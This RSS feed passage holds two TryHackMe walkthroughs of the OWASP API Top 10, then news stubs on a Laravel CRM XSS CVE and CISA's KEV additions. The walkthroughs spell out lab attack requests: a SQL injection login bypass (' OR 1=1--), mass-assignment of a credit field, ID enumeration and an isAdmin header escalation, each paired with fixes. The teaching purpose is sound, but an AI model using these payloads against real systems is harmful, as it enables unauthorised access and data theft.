fields.</p><p>👉 If not filtered properly, attackers can inject extra parameters and manipulate data.</p><h3>⚔️ Exploitation</h3><p>We attempt to create a user but include a hidden field:</p><pre>POST /apirule6/user</pre><pre>name=attacker&amp;username=hacker&amp;password=pass123&amp;credit=1000</pre><p>➡️ Here, credit should NOT be user-controlled.</p><p>➡️ But due to mass assignment, backend blindly accepts it.</p><h3>💥 Impact</h3><ul><li>Privilege escalation</li><li>Data tampering</li><li>Business logic abuse</li></ul><h3>🔐 Fix</h3><ul><li>Use allowlist (fillable)</li><li>Block sensitive fields (guarded)</li><li>Never trust client-side input</li></ul><h3>✅ Result</h3><p>Even when we send credit=1000, secure endpoint enforces:</p><p>➡️ Final credit → 50</p><h3>📌 Task 3 — Vulnerability VII: Security Misconfiguration</h3><h3>🧠 Understanding the Vulnerability</h3><p>Security misconfiguration happens when:</p><ul><li>Debug mode is enabled</li><li>Error messages expose internals</li><li>Default configs are not hardened</li></ul><h3>⚔️ Exploitation</h3><p>Triggering an error:</p><pre>GET /apirule7/ping_v</pre><p>➡️ Instead of a clean response, we get full stack trace.</p><h3>💥 Impact</h3><ul><li>File paths exposed</li><li>Internal architecture revealed</li><li>Helps attackers plan targeted attacks</li></ul><h3>🔐 Fix</h3><ul><li>Disable debug in production</li><li>Implement proper error handling</li><li>Hide stack traces</li></ul><h3>✅ Result</h3><ul><li>HTTP Code → 500</li><li>Error ID → 1401</li></ul><h3>📌 Task 4 — Vulnerability VIII: Injection</h3><h3>🧠 Understanding the Vulnerability</h3><p>Injection occurs when user input is directly executed by backend queries.</p><p>👉 Classic example: SQL Injection</p><h3>⚔️ Exploitation</h3><p>We bypass login using:</p><pre>POST /apirule8/user/login_v</pre><pre>username=admin&amp;password=' OR 1=1--</pre><p>➡️ ' OR 1=1-- makes condition always true ➡️ Authentication bypass achieved 🗿</p><h3>💥 Impact</h3><ul><li>Authentication bypass</li><li>Data extraction</li><li>Remote Code Execution (in severe cases)</li></ul><h3>🔐 Fix</h3><ul><li>Parameterized queries</li><li>Input validation</li><li>ORM usage</li></ul><h3>✅ Result</h3><p>Secure endpoint returns:</p><p>➡️ 403 Forbidden</p><h3>📌 Task 5 — Vulnerability IX: Improper Assets Management</h3><h3>🧠 Understanding the Vulnerability</h3><p>Old API versions often remain active and become forgotten attack surfaces.</p><h3>⚔️ Exploitation</h3><p>We target deprecated API:</p><pre>POST /apirule9/v1/user/login</pre><pre>username=Alice&amp;password=##!@#!!</pre><p>➡️ Old API leaks extra sensitive data.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*c4MBtw_Hv3MT_tgx.png"></figure><h3>💥 Impact</h3><ul><li>Sensitive data leakage</li><li>Access to outdated insecure logic</li><li>Potential full system compromise</li></ul><h3>🔐 Fix</h3><ul><li>Remove deprecated APIs</li><li>Maintain API inventory</li><li>Use proper versioning</li></ul><h3>✅ Result</h3><ul><li>Balance → 100</li><li>Country → USA</li></ul><h3>📌 Task 6 — Vulnerability X: Insufficient Logging &amp; Monitoring</h3><h3>🧠 Understanding the Vulnerability</h3><p>If logging is weak or missing:</p><p>➡️ Attacks happen silently</p><p>➡️ No traceability</p><h3>⚔️ Exploitation</h3><p>Trigger logging endpoint:</p><pre>GET /apirule10/logging</pre><p>➡️ Logs metadata like IP, browser, etc.</p><h3>💥 Impact</h3><ul><li>No forensic evidence</li><li>Delayed detection</li><li>Persistent attacker presence</li></ul><h3>🔐 Fix</h3><ul><li>Implement SIEM systems</li><li>Log all critical actions</li><li>Monitor anomalies</li></ul><h3>✅ Result</h3><p>➡️ HTTP Response → 200</p><h3>📌 Conclusion</h3><p>This part highlights a crucial shift:</p><p>👉 From user-level vulnerabilities → backend/system-level failures</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*wwo9sm2PI9WT5052.png"></figure><h3>🧠 Final Insights</h3><p>Across both parts, a pattern emerges:</p><ul><li>Trusting input → Injection / Mass Assignment</li><li>Poor configs → Info leaks</li><li>Legacy systems → Hidden attack surfaces</li><li>No monitoring → Undetected breaches</li></ul><h3>🚀 Final Take</h3><p>APIs don’t fail because they’re complex — they fail because developers trust too much and validate too little.</p><h3>👋 Connect With Me</h3><ul><li><strong>GitHub:</strong> <a href="https://github.com/AdityaBhatt3010">https://github.com/AdityaBhatt3010</a></li><li><strong>LinkedIn: </strong><a href="https://www.linkedin.com/in/adityabhatt3010/">https://www.linkedin.com/in/adityabhatt3010/</a></li><li><strong>Medium: </strong><a href="https://medium.com/@adityabhatt3010">https://medium.com/@adityabhatt3010</a></li></ul><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=b9d1100e2660" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/%EF%B8%8F-owasp-api-top-10-tryhackme-walkthrough-part-2-b9d1100e2660">🛡️ OWASP API Top 10 — TryHackMe Walkthrough (Part 2)</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OWASP API Security Top 10 (Part 1) — TryHackMe Walkthrough ️]]></title>
<description><![CDATA[Practical walkthrough of OWASP API Top 10 vulnerabilities with real exploitation steps and effective security fixes.Lab: https://tryhackme.com/room/owaspapisecuritytop105w📌 Task 1 — Introduction🧠 What’s HappeningYou’re basically spinning up a Windows VM + Talend API Tester + vulnerable Laravel ap...]]></description>
<link>https://tsecurity.de/de/3419638/hacking/owasp-api-security-top-10-part-1-tryhackme-walkthrough/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3419638/hacking/owasp-api-security-top-10-part-1-tryhackme-walkthrough/</guid>
<pubDate>Thu, 09 Apr 2026 10:07:58 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4>Practical walkthrough of OWASP API Top 10 vulnerabilities with real exploitation steps and effective security fixes.</h4><p><strong>Lab: </strong><a href="https://tryhackme.com/room/owaspapisecuritytop105w">https://tryhackme.com/room/owaspapisecuritytop105w</a></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*jbKix6pTWG768jb7.jpeg"></figure><h3>📌 Task 1 — Introduction</h3><h4>🧠 What’s Happening</h4><p>You’re basically spinning up a Windows VM + Talend API Tester + vulnerable Laravel app.</p><p>➡️ This environment is pre-configured for testing API vulnerabilities.</p><h4>✅ Outcome</h4><ul><li>Connected to VM successfully</li><li>Tools auto-launched</li><li>Ready for API testing</li></ul><h3>📌 Task 2 — Understanding APIs</h3><h4>🧠 Key Idea</h4><p>API = bridge between applications.</p><ul><li>Client sends request</li><li>Server responds</li><li>Defined via API documentation</li></ul><p>👉 APIs are core building blocks of modern apps</p><h4>🚨 Real Breaches (Important Insight)</h4><ul><li>LinkedIn → 700M users scraped via API</li><li>Twitter → 5.4M users exposed</li><li>PIXLR → 1.9M records leaked</li></ul><p>➡️ Lesson: APIs = high-value attack surface</p><h4>✅ Answers</h4><ul><li>Sample records → 1 million</li><li>API docs useless? → No (nay)</li></ul><h3>📌 Task 3 — BOLA (Broken Object Level Authorization)</h3><h3>🧠 Concept</h3><p>API exposes data using IDs but doesn’t check who is requesting.</p><p>➡️ ID change = data leak</p><h3>⚔️ PoC</h3><h4>Step 1 — Hit Vulnerable Endpoint</h4><pre>GET /apirule1_v/user/1</pre><p>➡️ Returns user data without any auth check.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/982/0*jiCQ1K6CjOsRiRiM.png"></figure><h3>Step 2 — ID Enumeration</h3><pre>GET /apirule1_v/user/2</pre><p>➡️ Just increment ID → access other users.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/982/0*4TMj_d8UCJI3Lt9k.png"></figure><h4>Step 3 — Extract Data</h4><ul><li>Total employees → 3</li><li>Flag (ID=2) → THM{838123}</li><li>Username (ID=3) → Bob</li></ul><h4>⚠️ Why Vulnerable</h4><ul><li>No authorization check</li><li>Predictable IDs</li><li>Direct object reference</li></ul><h4>🔐 Fix</h4><ul><li>Authorization tokens</li><li>Role validation</li><li>Use UUIDs</li></ul><h3>📌 Task 4 — Broken User Authentication (BUA)</h3><h3>🧠 Concept</h3><p>Login system is flawed — password not validated.</p><h3>⚔️ PoC</h3><h4>Step 1 — Login with Only Email</h4><pre>POST /apirule2/user/login_v</pre><pre>email=hr@mht.com&amp;password=anything</pre><p>➡️ Login works even with wrong password 💀</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/984/0*XWVsAIpHlY37KX83.png"></figure><h4>Step 2 — Get Token</h4><pre>cOC%Aonyis%H)mZ&amp;uJkuI?_W#4&amp;m&gt;Y</pre><p>➡️ Token issued without proper auth.</p><h4>Step 3 — Use Token</h4><pre>GET /apirule2/user/details<br>Authorization-Token: &lt;token&gt;</pre><p>➡️ Full account takeover.</p><h4>⚠️ Why Vulnerable</h4><ul><li>SQL checks only email</li><li>Password ignored</li><li>Token issued blindly</li></ul><h4>🔐 Fix</h4><ul><li>Validate password properly</li><li>Use hashing (bcrypt)</li><li>MFA + JWT</li></ul><h4>✅ Extra Answer</h4><ul><li>GET request for creds? → No (nay)</li></ul><h3>📌 Task 5 — Excessive Data Exposure</h3><h3>🧠 Concept</h3><p>API returns too much information, expecting frontend to filter.</p><p>➡️ Attacker intercepts raw response → gets secrets.</p><h3>⚔️ PoC</h3><h4>Step 1 — Fetch Comment</h4><pre>GET /apirule3/comment_v/2</pre><p>➡️ Returns full dataset including hidden fields.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/985/0*bz6UtIE22mKqDHMD.png"></figure><h4>Step 2 — Extract Sensitive Data</h4><ul><li>Device ID → <strong>iOS15.411</strong></li></ul><h4>Step 3 — Another Record</h4><pre>GET /apirule3/comment_v/3</pre><p>➡️ Username → <strong>hacker#!</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/981/0*ndJ8pFzCgVMOZRxz.png"></figure><h4>⚠️ Why Vulnerable</h4><ul><li>Backend sends everything</li><li>No filtering</li><li>Trusting frontend</li></ul><h4>🔐 Fix</h4><ul><li>Return minimal data</li><li>Avoid generic serializers</li><li>Validate API responses</li></ul><h4>✅ Answer</h4><ul><li>Network-level fix only? → No (nay)</li></ul><h3>📌 Task 6 — Lack of Resources &amp; Rate Limiting</h3><h3>🧠 Concept</h3><p>No request limits → attackers can spam endpoints.</p><p>➡️ Leads to DoS or financial abuse.</p><h3>⚔️ PoC</h3><h4>Step 1 — Send OTP</h4><pre>POST /apirule4/sendOTP_s<br>email=hr@mht.com</pre><p>➡️ Response → 200</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/986/0*R5RtRQngMMEjYy_B.png"></figure><h4>Step 2 — Invalid Email</h4><pre>POST /apirule4/sendOTP_s<br>email=sale@mht.com</pre><pre>Invalid Email</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/983/0*qwVnB_KJOfVcSK0H.png"></figure><h4>⚠️ Why Vulnerable</h4><ul><li>No rate limiting</li><li>Unlimited requests</li><li>Resource exhaustion</li></ul><h4>🔐 Fix</h4><ul><li>Rate limiting (time-based)</li><li>CAPTCHA</li><li>Request quotas</li></ul><h4>✅ Answer</h4><ul><li>Rate limiting at network level? → Yes (yea)</li></ul><h3>📌 Task 7 — Broken Function Level Authorization</h3><h3>🧠 Concept</h3><p>User can escalate privileges by manipulating request parameters.</p><h3>⚔️ PoC</h3><h4>Step 1 — Send Admin Request</h4><pre>GET /apirule5/users_v<br>Authorization-Token: YWxpY2U6dGVzdCFAISM6Nzg5Nzg=<br>isAdmin: 1</pre><p>➡️ Normal user accesses admin data 😶</p><h4>Step 2 — Extract Data</h4><ul><li>Alice mobile → +1235322323</li><li>Admin flag → THM{3432$@#2!}</li></ul><h4>⚠️ Why Vulnerable</h4><ul><li>Trusting client input (isAdmin)</li><li>No backend role validation</li></ul><h4>🔐 Fix</h4><ul><li>Enforce RBAC server-side</li><li>Ignore client-controlled role fields</li></ul><h4>✅ Answer</h4><ul><li>isAdmin in hidden field safe? → No (nay)</li></ul><h3>📌 Task 8 — Conclusion</h3><h4>🧠 What You Learned</h4><p>This lab basically drills 5 core API failures:</p><ol><li>BOLA → ID-based data leaks</li><li>BUA → Broken login logic</li><li>Data Exposure → Too much data returned</li><li>No Rate Limiting → Abuse possible</li><li>Function Auth → Privilege escalation</li></ol><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*OqfrS8trWizxPHLvJRNpIw.png"></figure><h3>🧾 Final Take (Important)</h3><p>👉 APIs fail mainly due to trust assumptions:</p><ul><li>Trusting IDs → BOLA</li><li>Trusting login → BUA</li><li>Trusting frontend → Data leak</li><li>No limits → Abuse</li><li>Trusting user roles → Admin bypass</li></ul><h3>👋 Outro</h3><p>If this helped, connect here:</p><ul><li><strong>GitHub:</strong> <a href="https://github.com/AdityaBhatt3010">https://github.com/AdityaBhatt3010</a></li><li><strong>LinkedIn:</strong> <a href="https://www.linkedin.com/in/adityabhatt3010/">https://www.linkedin.com/in/adityabhatt3010/</a></li><li><strong>Medium:</strong> <a href="https://medium.com/@adityabhatt3010">https://medium.com/@adityabhatt3010</a></li></ul><p>More writeups soon — cleaner, deeper, and slightly unhinged 🗿🔥</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=7b232b4ac745" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/owasp-api-security-top-10-part-1-tryhackme-walkthrough-%EF%B8%8F-7b232b4ac745">OWASP API Security Top 10 (Part 1) — TryHackMe Walkthrough 🛡️</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why strip_tags() Does Not Protect You From XSS in PHP/Laravel]]></title>
<description><![CDATA[A False Sense of Security That Your Code Probably Has Right NowContinue reading on InfoSec Write-ups »]]></description>
<link>https://tsecurity.de/de/3415060/hacking/why-striptags-does-not-protect-you-from-xss-in-phplaravel/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3415060/hacking/why-striptags-does-not-protect-you-from-xss-in-phplaravel/</guid>
<pubDate>Tue, 07 Apr 2026 20:08:25 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="medium-feed-item"><p class="medium-feed-image"><a href="https://infosecwriteups.com/why-strip-tags-does-not-protect-you-from-xss-in-php-laravel-c97d0e805213"><img src="https://cdn-images-1.medium.com/max/1376/1*d86Q5KGsmHn0SOL1BpCoaA.png" width="1376"></a></p><p class="medium-feed-snippet">A False Sense of Security That Your Code Probably Has Right Now</p><p class="medium-feed-link"><a href="https://infosecwriteups.com/why-strip-tags-does-not-protect-you-from-xss-in-php-laravel-c97d0e805213">Continue reading on InfoSec Write-ups »</a></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The orWhere Trap: How SQL Operator Precedence Breaks Multi-Tenant Data Isolation in Laravel]]></title>
<description><![CDATA[Why Global Scopes Fail When You Chain orWhere Without a ClosureContinue reading on InfoSec Write-ups »]]></description>
<link>https://tsecurity.de/de/3415058/hacking/the-orwhere-trap-how-sql-operator-precedence-breaks-multi-tenant-data-isolation-in-laravel/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3415058/hacking/the-orwhere-trap-how-sql-operator-precedence-breaks-multi-tenant-data-isolation-in-laravel/</guid>
<pubDate>Tue, 07 Apr 2026 20:08:22 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="medium-feed-item"><p class="medium-feed-image"><a href="https://infosecwriteups.com/the-orwhere-trap-how-sql-operator-precedence-breaks-multi-tenant-data-isolation-in-laravel-ec598f5a0f27"><img src="https://cdn-images-1.medium.com/max/1376/1*e_kFcTwygBQwQ9tSquDKQw.png" width="1376"></a></p><p class="medium-feed-snippet">Why Global Scopes Fail When You Chain orWhere Without a Closure</p><p class="medium-feed-link"><a href="https://infosecwriteups.com/the-orwhere-trap-how-sql-operator-precedence-breaks-multi-tenant-data-isolation-in-laravel-ec598f5a0f27">Continue reading on InfoSec Write-ups »</a></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-5370 | krayin laravel-crm up to 2.2 Activities Module/Notes inbox.spec.ts composeMail cross site scripting (Issue 2419)]]></title>
<description><![CDATA[A vulnerability identified as problematic has been detected in krayin laravel-crm up to 2.2. Impacted is the function composeMail of the file packages/Webkul/Admin/tests/e2e-pw/tests/mail/inbox.spec.ts of the component Activities Module/Notes Module. The manipulation leads to cross site scripting...]]></description>
<link>https://tsecurity.de/de/3401563/sicherheitsluecken/cve-2026-5370-krayin-laravel-crm-up-to-22-activities-modulenotes-inboxspects-composemail-cross-site-scripting-issue-2419/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3401563/sicherheitsluecken/cve-2026-5370-krayin-laravel-crm-up-to-22-activities-modulenotes-inboxspects-composemail-cross-site-scripting-issue-2419/</guid>
<pubDate>Thu, 02 Apr 2026 07:51:09 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">problematic</a> has been detected in <a href="https://vuldb.com/product/krayin:laravel-crm">krayin laravel-crm up to 2.2</a>. Impacted is the function <code>composeMail</code> of the file <em>packages/Webkul/Admin/tests/e2e-pw/tests/mail/inbox.spec.ts</em> of the component <em>Activities Module/Notes Module</em>. The manipulation leads to cross site scripting.

This vulnerability is referenced as <a href="https://vuldb.com/source_cve/354756">CVE-2026-5370</a>. Remote exploitation of the attack is possible. Furthermore, an exploit is available.

To fix this issue, it is recommended to deploy a patch.]]></content:encoded>
</item>
<item>
<title><![CDATA[CISA Adds Apple, Craft CMS, and Laravel Livewire Flaws to KEV Catalog as Active Exploitation Expands]]></title>
<description><![CDATA[The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added five security flaws affecting Apple products, Craft CMS, and Laravel Livewire to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. The newly added vulnerabilities ...]]></description>
<link>https://tsecurity.de/de/3374197/it-security-nachrichten/cisa-adds-apple-craft-cms-and-laravel-livewire-flaws-to-kev-catalog-as-active-exploitation-expands/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3374197/it-security-nachrichten/cisa-adds-apple-craft-cms-and-laravel-livewire-flaws-to-kev-catalog-as-active-exploitation-expands/</guid>
<pubDate>Mon, 23 Mar 2026 17:07:27 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<table> <tr><td> <a href="https://www.reddit.com/r/security/comments/1s1j7sf/cisa_adds_apple_craft_cms_and_laravel_livewire/"> <img src="https://external-preview.redd.it/8bj5NtqvCcoK6X2Q_MNnK4jIfs-mU_LFi3eCBGlUWu4.jpeg?width=640&amp;crop=smart&amp;auto=webp&amp;s=4b29e032d8b5e23be79069fa922b8b47aca709f5" alt="CISA Adds Apple, Craft CMS, and Laravel Livewire Flaws to KEV Catalog as Active Exploitation Expands" title="CISA Adds Apple, Craft CMS, and Laravel Livewire Flaws to KEV Catalog as Active Exploitation Expands"> </a> </td><td> <!-- SC_OFF --><div class="md"><p>The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added five security flaws affecting Apple products, Craft CMS, and Laravel Livewire to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild.</p> <p>The newly added vulnerabilities are listed below -</p> <ul> <li><strong>CVE-2025-31277</strong> (CVSS score: 8.8) - Apple Multiple Products Buffer Overflow Vulnerability</li> <li><strong>CVE-2025-32432</strong> (CVSS score: 10.0) - Craft CMS Code Injection Vulnerability</li> <li><strong>CVE-2025-43510</strong> (CVSS score: 7.8) - Apple Multiple Products Improper Locking Vulnerability</li> <li><strong>CVE-2025-43520</strong> (CVSS score: 8.8) - Apple Multiple Products Classic Buffer Overflow Vulnerability</li> <li><strong>CVE-2025-54068</strong> (CVSS score: 9.8) - Laravel Livewire Code Injection Vulnerability</li> </ul> <p>Federal Civilian Executive Branch (FCEB) agencies have been directed to apply the necessary mitigations by <strong>April 3, 2026</strong>, as required under Binding Operational Directive (BOD) 22-01.</p> <p>While KEV deadlines apply to federal agencies, the catalog serves as a strong warning to private-sector organizations as well, given that inclusion means the flaws are no longer merely theoretical and have already been weaponized by threat actors.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Far_Mycologist4839"> /u/Far_Mycologist4839 </a> <br> <span><a href="https://www.neuracybintel.com/articles/cisa-adds-apple-craft-cms-and-laravel-livewire-flaws-to-kev-catalog-as-active-exploitation-expands?utm_source=reddit&amp;utm_medium=social&amp;utm_campaign=articles_share">[link]</a></span>   <span><a href="https://www.reddit.com/r/security/comments/1s1j7sf/cisa_adds_apple_craft_cms_and_laravel_livewire/">[comments]</a></span> </td></tr></table>]]></content:encoded>
</item>
<item>
<title><![CDATA[U.S. CISA adds Apple, Laravel Livewire and Craft CMS flaws to its Known Exploited Vulnerabilities catalog]]></title>
<description><![CDATA[U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Apple, Laravel Livewire and Craft CMS flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Apple, Laravel Livewire and Craft CMS flaws to its Known Exploited…
...]]></description>
<link>https://tsecurity.de/de/3370780/it-security-nachrichten/us-cisa-adds-apple-laravel-livewire-and-craft-cms-flaws-to-its-known-exploited-vulnerabilities-catalog/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3370780/it-security-nachrichten/us-cisa-adds-apple-laravel-livewire-and-craft-cms-flaws-to-its-known-exploited-vulnerabilities-catalog/</guid>
<pubDate>Sun, 22 Mar 2026 16:34:23 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Apple, Laravel Livewire and Craft CMS flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Apple, Laravel Livewire and Craft CMS flaws to its Known Exploited…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/u-s-cisa-adds-apple-laravel-livewire-and-craft-cms-flaws-to-its-known-exploited-vulnerabilities-catalog/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/u-s-cisa-adds-apple-laravel-livewire-and-craft-cms-flaws-to-its-known-exploited-vulnerabilities-catalog/">U.S. CISA adds Apple, Laravel Livewire and Craft CMS flaws to its Known Exploited Vulnerabilities catalog</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[U.S. CISA adds Apple, Laravel Livewire and Craft CMS flaws to its Known Exploited Vulnerabilities catalog]]></title>
<description><![CDATA[U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Apple, Laravel Livewire and Craft CMS flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Apple, Laravel Livewire and Craft CMS flaws to its Known Exploited V...]]></description>
<link>https://tsecurity.de/de/3370736/it-security-nachrichten/us-cisa-adds-apple-laravel-livewire-and-craft-cms-flaws-to-its-known-exploited-vulnerabilities-catalog/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3370736/it-security-nachrichten/us-cisa-adds-apple-laravel-livewire-and-craft-cms-flaws-to-its-known-exploited-vulnerabilities-catalog/</guid>
<pubDate>Sun, 22 Mar 2026 16:06:02 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Apple, Laravel Livewire and Craft CMS flaws to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Apple, Laravel Livewire and Craft CMS flaws to its Known Exploited Vulnerabilities (KEV) catalog. Below are the flaws added to the catalog: CISA added the three […]]]></content:encoded>
</item>
<item>
<title><![CDATA[CISA fordert Sicherheitsupdates für Apple, Craft CMS und Laravel]]></title>
<description><![CDATA[WASHINGTON / LONDON (IT BOLTWISE) – Die US-amerikanische Cybersecurity and Infrastructure Security Agency (CISA) hat fünf Sicherheitslücken in Apple, Craft CMS und Laravel identifiziert, die bis April 2026 gepatcht werden müssen. Diese Schwachstellen werden bereits aktiv ausgenutzt, was die Dring...]]></description>
<link>https://tsecurity.de/de/3368745/it-security-nachrichten/cisa-fordert-sicherheitsupdates-fuer-apple-craft-cms-und-laravel/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3368745/it-security-nachrichten/cisa-fordert-sicherheitsupdates-fuer-apple-craft-cms-und-laravel/</guid>
<pubDate>Sat, 21 Mar 2026 10:51:01 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/03/ai-cybersecurity-vulnerabilities-4.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/03/ai-cybersecurity-vulnerabilities-4.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/03/ai-cybersecurity-vulnerabilities-4-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/03/ai-cybersecurity-vulnerabilities-4-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/03/ai-cybersecurity-vulnerabilities-4-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/03/ai-cybersecurity-vulnerabilities-4-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/03/ai-cybersecurity-vulnerabilities-4-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">WASHINGTON / LONDON (IT BOLTWISE) – Die US-amerikanische Cybersecurity and Infrastructure Security Agency (CISA) hat fünf Sicherheitslücken in Apple, Craft CMS und Laravel identifiziert, die bis April 2026 gepatcht werden müssen. Diese Schwachstellen werden bereits aktiv ausgenutzt, was die Dringlichkeit der Updates unterstreicht. Die US-amerikanische Cybersecurity and Infrastructure Security Agency (CISA) hat kürzlich fünf kritische […]</p>
<div><a href="https://www.it-boltwise.de/cisa-fordert-sicherheitsupdates-fuer-apple-craft-cms-und-laravel.html">... den vollständigen Artikel <strong>»CISA fordert Sicherheitsupdates für Apple, Craft CMS und Laravel«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/cisa-fordert-sicherheitsupdates-fuer-apple-craft-cms-und-laravel.html">CISA fordert Sicherheitsupdates für Apple, Craft CMS und Laravel</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE® x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CISA Flags Apple, Craft CMS, Laravel Bugs in KEV, Orders Patching by April 3, 2026]]></title>
<description><![CDATA[The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added five security flaws impacting Apple, Craft CMS, and Laravel Livewire to its Known Exploited Vulnerabilities (KEV) catalog, urging federal agencies to patch them by April 3, 2026.
The vulnerabilities that have come un...]]></description>
<link>https://tsecurity.de/de/3368682/it-security-nachrichten/cisa-flags-apple-craft-cms-laravel-bugs-in-kev-orders-patching-by-april-3-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3368682/it-security-nachrichten/cisa-flags-apple-craft-cms-laravel-bugs-in-kev-orders-patching-by-april-3-2026/</guid>
<pubDate>Sat, 21 Mar 2026 10:06:32 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added five security flaws impacting Apple, Craft CMS, and Laravel Livewire to its Known Exploited Vulnerabilities (KEV) catalog, urging federal agencies to patch them by April 3, 2026.
The vulnerabilities that have come under exploitation are listed below -

CVE-2025-31277 (CVSS score: 8.8) - A vulnerability in Apple]]></content:encoded>
</item>
<item>
<title><![CDATA[CISA Adds Five Known Exploited Vulnerabilities to Catalog]]></title>
<description><![CDATA[CISA has added five new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.

CVE-2025-31277 Apple Multiple Products Buffer Overflow Vulnerability
CVE-2025-32432 Craft CMS Code Injection Vulnerability
CVE-2025-43510 Apple Multiple Product...]]></description>
<link>https://tsecurity.de/de/3367442/it-security-nachrichten/cisa-adds-five-known-exploited-vulnerabilities-to-catalog/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3367442/it-security-nachrichten/cisa-adds-five-known-exploited-vulnerabilities-to-catalog/</guid>
<pubDate>Fri, 20 Mar 2026 17:19:43 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>CISA has added five new vulnerabilities to its <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" data-entity-type="node" data-entity-uuid="79453b83-86b9-4e2f-b1ec-abf73c6eb291" data-entity-substitution="canonical" title="Known Exploited Vulnerabilities Catalog">Known Exploited Vulnerabilities (KEV) Catalog</a>, based on evidence of active exploitation.</p>
<ul>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2025-31277" target="_blank">CVE-2025-31277</a> Apple Multiple Products Buffer Overflow Vulnerability</li>
